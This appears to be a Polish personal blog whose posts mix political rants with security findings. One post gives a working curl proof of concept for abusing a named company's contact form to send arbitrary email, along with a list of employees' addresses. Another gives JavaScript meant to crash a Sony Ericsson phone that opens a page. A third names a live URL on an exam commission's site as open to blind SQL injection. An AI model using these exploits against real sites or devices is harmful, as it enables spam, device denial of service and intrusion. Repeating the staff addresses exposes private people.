Oprócz produktów dostaniesz SPAM!

Ok, w ramach akcji przeciw cenzurze firmy Sokołów zauważyłem coś ciekawego, otóż emaile kontaktowe osób są podane w kodzie źródłowym w polu emails, w formularzu z opiniami przeanalizowałem więc żądanie wysłania takiego maila (Live HTTP Headers), wyglądało ono tak:

POST /index.php HTTP/1.1
module=ajax&action=poll&emails=cezary.jasinski@sokolow.pl,wojciech.karwacki@sokolow.pl,marcin.balanda@sokolow.pl,antoni.gibowicz@sokolow.pl,artur.zurowicz@sokolow.pl,marek.tarko@sokolow.pl,marzena.ladziak@sokolow.pl,malgorzata.babiarz@sokolow.pl,elzbieta.baran@sokolow.pl,Joanna.rzetelska@sokolow.pl,Justyna.malycha@sokolow.pl,Dorota.kusztal@sokolow.pl,Teresa.kobylinska@sokolow.pl,marek.grabowski@sokolow.pl,dariusz.soszynski@soklow.pl,maciej.czescik@sokolow.pl&content=Stop cenzurze!&email=moj_mail

Zmieniłem pole emails na moj e-mail, i dostałem e-mail z Sokołowa😀
Tak więc, zmieniając pole emails, możemy wysłać e-mail do dowolnej osoby, pole email oznacza od kogo jest ten mail a content to nie trudno się domyślić😉
Oryginalna wersja słowa SPAM nabiera nowego znaczenia😀
Tak to już jest gdy programista jest leniwy…

PoC
curl -d module=ajax -d action=poll -d emails=twoj_mail -d content=dupa+jasiu -d email=hack@er.pl http://sokolow.pl/index.php
Powinniśmy otrzymać cyfrę 1 w odpowiedzi, a na naszą skrzynkę przyjdzie mail z Sokołowa😉

Aha, można wysyłać jeden mail do kilku osób bez zmieniania pola emails, wystraczy emaile do których chcemy wysłać oddzielić przecinkiem, ale to już chyba wywnioskowałeś😉

We wczorajszych „Faktach” zobaczyłem materiał który mnie zszokował, otóż pewien, „dziennikarz”, prawicowego tygodnika „wPolityce” – Witold Gadowski napisał artykuł, o pewnym zespole muzycznym, opowiadający o tym, że grupa ta wzięła swoją nazwę od zbrodniarza ukraińskiego. Nie zdziwiło mnie to bo prawicowcom zawsze wszystko kojarzy się z czymś co budzi negatywne emocje, no cóż, i tacy kretyni chodzą po ziemi.
Jednak najbardziej wkurwiło mnie to, że adorują Dmowskiego i Piaseckiego, którzy też byli faszystami! Zacytuję tu ulubioną przez pana Gadowskiego Wikipedię:
„Dmowski nie ukrywał także sympatii do ruchu faszystowskiego”
„Był jednym z założycieli Obozu Narodowo-Radykalnego, a następnie po rozłamie, przywódcą Ruchu Narodowo-Radykalnego Falanga, głosząc poglądy antykomunistyczne i antysemickie. Jego partia i ówczesne poglądy Piaseckiego są niekiedy określane mianem jawnie faszystowskiego”
Hipokryzja chodzi po ziemi, i ma tytuł wPolityce!

SE k800i DoS

Istnieje możliwość zawieszenia telefonu marki Sony Ericsson k800i (u mnie przynajmniej działa)document.wi
Robimy stronę w HTMLu i wpisujemy w nią


script
document.writeln("textarea");
for(w=0;w<5000;w++){
document.writeln("ABCDEFGHIJKLMNOPQRSTUVWXYZ");
}
document.writeln("textarea")
script

(dałem samo textarea i script bo wordpress.com ucina tagi każdy chyba wie że trzeba to otworzyć i zamknąć ;))
Kiedy nasz widz po długim ładowaniu pole tekstowe i za pomocą naciśnięcia klawisza konsoli będzie chciał je otworzyć zrestartuje mu się telefon😉 (zgadnij dlaczego :P)
Chciałbym polecić blog mojego kolegi ponieważ zauważyłem że on mnie promuje to i ja go popromuje też😉

OK, chyba czegoś nie rozumiem serwis Fronda, który na swoich łamach ostrzega przed „wszelkimi formami okultyzmu i magii” (uwaga) sprzedaje w swojej księgarni (pisze jak byk w tytule – księgarnia wyawnictwa fronda)…
książki o przygodach młodego czarodzieja (jakby link nie działał trzeba w wyszukiwarce na stronie księgarni wpisać Harry Potter)
Dodatkowo możemy znaleźć tam książkę o tym jakie ważne wartości edukacyjne ma ta książka która jest jednocześnie przewodnikiem po świecie Harrego Pottera
Tylko tyle? Nie!
Znajdziemy tam też pozycję „NLP w 21 dni”, przy czym NLP znajduje się na ichniejszej liście zagrożeń duchowych (odradzam czytać) pod literką n
Ciekawe co będzie następne na liście książek… Może „Biblia szatana”?😛
I na koniec cytat który mnie już kompletnie rozwalił z artykułu na temat tego, że aktor grający Harrego Pottera (ja jak) popiera związki homoseksualne:
„Czarodziej sugeruje również, że Obama jest za mało lewicowym politykiem ” i „Miejmy nadzieję, że Harry Potter nie wsiądzie na swoją tęczową miotłę i nie pojedzie do USA walczyć z mormonem Romneyem, który też gejów nie lubi.”
Teraz już wiem kim zostanę w przyszłości, zostanę czarodziejem!
Przyznam, że dość długo czekałem, i moja miotła zarosła kurzem…😉

CKE [can be] hacked again?

W stronie Centralnej Komisji Egzaminacyjnej znajduje się błąd typu Blind SQL Injection:
http://www.cke.edu.pl/index.php?option=content&task=view&id=293&Itemid=
Wysłałem dwa trzy listy do CKE z prośbą o naprawienie tego błędu i jeden do NASK CERT z prośbą o poinformowanie administratorów portalu o tym błędzie
Na razie błąd jak był tak i jest i chyba strona komisji w tym roku znów zostanie podmnieniona, więc nie należy pytać czy strona zostanie podmieniona tylko co będzie na tegorocznym defejsie😉
EDIT:
Znalazłem komentarz na Niebezpieczniku w którym jego autor mówi że ostrzegł CKE co potwierdza moją teze że w tym roku znów będzie hack😉

EDIT2:
Kolejny komentarz, jak się okazuje oprogramowanie na serwerze jest przestarzałe😉

IE8 XSS?

Mam małe podejrzenia co do błędu XSS w IE8
gdyż ponieważ kiedy wpisałem xss-a w polu wyszukiwania pewnej strony a następnie skasowałem jego zawartość i kliknąłem to wyskoczyło okienko😉
Wiąże się to chyba z historią wyszukiwania oferowaną przez IE
Bardzo ciekawe